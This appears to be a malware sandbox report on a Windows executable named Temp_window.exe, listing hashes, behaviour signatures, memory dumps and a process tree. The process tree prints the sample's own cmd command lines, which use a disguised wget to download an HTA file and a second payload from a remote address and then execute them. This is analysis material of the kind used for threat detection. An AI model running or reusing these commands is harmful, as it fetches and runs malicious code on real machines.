ab4e579283b5eb3cf9f3deef491e7a44aa91adfdc68ab509605002b769662290

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
27/05/2023, 05:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Temp_window.exe
Size

5.0MB
MD5

b71c658aacf6d01b1b68fc9d7cb4287e
SHA1

58ee38c7ab9d8e37e17d98892cb1953b99648ff8
SHA256

ab4e579283b5eb3cf9f3deef491e7a44aa91adfdc68ab509605002b769662290
SHA512

1bb719835a8a91541ad572f432365449c177c8f41c48c059074d9484b70862699e616eb4aab7910e33bc91b9b5477f07028e1b46bc6096fe6432f072caf1d996
SSDEEP

98304:4Ax56cJP4TUnrDFEZ6uCmoBvYWxvHyh4kokhG83GS89+gPu0LC8YdK:5x56c14TkDFEZ6uCmoBvYWxvLkhV3h8n

Score

7^/10

Malware Config

Signatures

Deletes itself 1 IoCs

pid	Process
2320	Temp_window.exe

Executes dropped EXE 6 IoCs

pid	Process
1480	winhe1p.exe
3684	winhe1p.exe
3884	winhe1p.exe
4800	winhe1p.exe
1660	winhe1p.exe
2740	winhe1p.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Temp:window.txt	Temp_window.exe
File created	C:\windows\winhe1p.exe	Temp_window.exe
File created	C:\Windows\winpool.sys	Temp_window.exe
File opened for modification	C:\Windows\winpool.sys	Temp_window.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Windows\Temp:window.txt	Temp_window.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
652	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
2320	Temp_window.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 2320 wrote to memory of 464	2320	Temp_window.exe	82
PID 2320 wrote to memory of 464	2320	Temp_window.exe	82
PID 2320 wrote to memory of 464	2320	Temp_window.exe	82
PID 464 wrote to memory of 1480	464	cmd.exe	84
PID 464 wrote to memory of 1480	464	cmd.exe	84
PID 464 wrote to memory of 1480	464	cmd.exe	84
PID 1480 wrote to memory of 3684	1480	winhe1p.exe	85
PID 1480 wrote to memory of 3684	1480	winhe1p.exe	85
PID 1480 wrote to memory of 3684	1480	winhe1p.exe	85
PID 2320 wrote to memory of 736	2320	Temp_window.exe	86
PID 2320 wrote to memory of 736	2320	Temp_window.exe	86
PID 2320 wrote to memory of 736	2320	Temp_window.exe	86
PID 2320 wrote to memory of 400	2320	Temp_window.exe	88
PID 2320 wrote to memory of 400	2320	Temp_window.exe	88
PID 2320 wrote to memory of 400	2320	Temp_window.exe	88
PID 400 wrote to memory of 3884	400	cmd.exe	90
PID 400 wrote to memory of 3884	400	cmd.exe	90
PID 400 wrote to memory of 3884	400	cmd.exe	90
PID 3884 wrote to memory of 4800	3884	winhe1p.exe	91
PID 3884 wrote to memory of 4800	3884	winhe1p.exe	91
PID 3884 wrote to memory of 4800	3884	winhe1p.exe	91
PID 2320 wrote to memory of 1208	2320	Temp_window.exe	98
PID 2320 wrote to memory of 1208	2320	Temp_window.exe	98
PID 2320 wrote to memory of 1208	2320	Temp_window.exe	98
PID 1208 wrote to memory of 1660	1208	cmd.exe	100
PID 1208 wrote to memory of 1660	1208	cmd.exe	100
PID 1208 wrote to memory of 1660	1208	cmd.exe	100
PID 1660 wrote to memory of 2740	1660	winhe1p.exe	101
PID 1660 wrote to memory of 2740	1660	winhe1p.exe	101
PID 1660 wrote to memory of 2740	1660	winhe1p.exe	101

C:\Users\Admin\AppData\Local\Temp\Temp_window.exe
"C:\Users\Admin\AppData\Local\Temp\Temp_window.exe"
1⤵
- Deletes itself
- Drops file in Windows directory
- NTFS ADS
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:2320
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c winhe1p -b -q --limit-rate=300k -O C:/bookss.hta http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/123.hta
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:464
- - C:\Windows\winhe1p.exe
    winhe1p -b -q --limit-rate=300k -O C:/bookss.hta http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/123.hta
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1480
  - - C:\Windows\winhe1p.exe
      winhe1p -b -q --limit-rate=300k -O C:/bookss.hta http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/123.hta
      4⤵
      Executes dropped EXE
      PID:3684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\\bookss.hta
  2⤵
  PID:736
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c winhe1p -b -q --limit-rate=300k -O C:/book http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/456
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:400
- - C:\Windows\winhe1p.exe
    winhe1p -b -q --limit-rate=300k -O C:/book http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/456
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3884
  - - C:\Windows\winhe1p.exe
      winhe1p -b -q --limit-rate=300k -O C:/book http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/456
      4⤵
      Executes dropped EXE
      PID:4800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c winhe1p -b -q --limit-rate=300k -O C:/bookss.hta http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/123.hta
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1208
- - C:\Windows\winhe1p.exe
    winhe1p -b -q --limit-rate=300k -O C:/bookss.hta http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/123.hta
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1660
  - - C:\Windows\winhe1p.exe
      winhe1p -b -q --limit-rate=300k -O C:/bookss.hta http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/123.hta
      4⤵
      Executes dropped EXE
      PID:2740

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\winhe1p.exe

Filesize
4.8MB

MD5
a6c81b1cb030b42e3dd72531734c1334

SHA1
0086f2db77ec34128806341026495d39ccf998c7

SHA256
e83a75eb44fe7495edf4f9c352f7f5e8360537353770a6e7f6029bf7b6b9a5f7

SHA512
636ff0cb7d6cb719300ed42e48db22c547099b2152e3b34ddcc9319ed20d60e11a2fbc2a66fbd4c2a7842c9b3cd889a30635db61669edd5c0fbf339ab6a4b5e9

Download Submit
C:\Windows\winhe1p.exe

Filesize
4.8MB

MD5
a6c81b1cb030b42e3dd72531734c1334

SHA1
0086f2db77ec34128806341026495d39ccf998c7

SHA256
e83a75eb44fe7495edf4f9c352f7f5e8360537353770a6e7f6029bf7b6b9a5f7

SHA512
636ff0cb7d6cb719300ed42e48db22c547099b2152e3b34ddcc9319ed20d60e11a2fbc2a66fbd4c2a7842c9b3cd889a30635db61669edd5c0fbf339ab6a4b5e9

Download Submit
C:\Windows\winhe1p.exe

Filesize
4.8MB

MD5
a6c81b1cb030b42e3dd72531734c1334

SHA1
0086f2db77ec34128806341026495d39ccf998c7

SHA256
e83a75eb44fe7495edf4f9c352f7f5e8360537353770a6e7f6029bf7b6b9a5f7

SHA512
636ff0cb7d6cb719300ed42e48db22c547099b2152e3b34ddcc9319ed20d60e11a2fbc2a66fbd4c2a7842c9b3cd889a30635db61669edd5c0fbf339ab6a4b5e9

Download Submit
C:\Windows\winhe1p.exe

Filesize
4.8MB

MD5
a6c81b1cb030b42e3dd72531734c1334

SHA1
0086f2db77ec34128806341026495d39ccf998c7

SHA256
e83a75eb44fe7495edf4f9c352f7f5e8360537353770a6e7f6029bf7b6b9a5f7

SHA512
636ff0cb7d6cb719300ed42e48db22c547099b2152e3b34ddcc9319ed20d60e11a2fbc2a66fbd4c2a7842c9b3cd889a30635db61669edd5c0fbf339ab6a4b5e9

Download Submit
C:\Windows\winhe1p.exe

Filesize
4.8MB

MD5
a6c81b1cb030b42e3dd72531734c1334

SHA1
0086f2db77ec34128806341026495d39ccf998c7

SHA256
e83a75eb44fe7495edf4f9c352f7f5e8360537353770a6e7f6029bf7b6b9a5f7

SHA512
636ff0cb7d6cb719300ed42e48db22c547099b2152e3b34ddcc9319ed20d60e11a2fbc2a66fbd4c2a7842c9b3cd889a30635db61669edd5c0fbf339ab6a4b5e9

Download Submit
C:\Windows\winhe1p.exe

Filesize
4.8MB

MD5
a6c81b1cb030b42e3dd72531734c1334

SHA1
0086f2db77ec34128806341026495d39ccf998c7

SHA256
e83a75eb44fe7495edf4f9c352f7f5e8360537353770a6e7f6029bf7b6b9a5f7

SHA512
636ff0cb7d6cb719300ed42e48db22c547099b2152e3b34ddcc9319ed20d60e11a2fbc2a66fbd4c2a7842c9b3cd889a30635db61669edd5c0fbf339ab6a4b5e9

Download Submit
C:\Windows\winhe1p.exe

Filesize
4.8MB

MD5
a6c81b1cb030b42e3dd72531734c1334

SHA1
0086f2db77ec34128806341026495d39ccf998c7

SHA256
e83a75eb44fe7495edf4f9c352f7f5e8360537353770a6e7f6029bf7b6b9a5f7

SHA512
636ff0cb7d6cb719300ed42e48db22c547099b2152e3b34ddcc9319ed20d60e11a2fbc2a66fbd4c2a7842c9b3cd889a30635db61669edd5c0fbf339ab6a4b5e9

Download Submit
memory/1480-142-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/1660-155-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/2320-159-0x0000000000500000-0x0000000000525000-memory.dmp

Filesize
148KB

Download
memory/2320-133-0x00000000004F0000-0x0000000000500000-memory.dmp

Filesize
64KB

Download
memory/2320-156-0x0000000000500000-0x0000000000525000-memory.dmp

Filesize
148KB

Download
memory/2740-193-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/2740-178-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/2740-187-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/2740-166-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/2740-160-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/2740-172-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/3684-176-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/3684-179-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/3684-143-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/3684-170-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/3684-164-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/3684-157-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/3684-185-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/3884-148-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/4800-162-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/4800-183-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/4800-150-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/4800-174-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/4800-189-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/4800-192-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download
memory/4800-168-0x0000000000F90000-0x0000000001477000-memory.dmp

Filesize
4.9MB

Download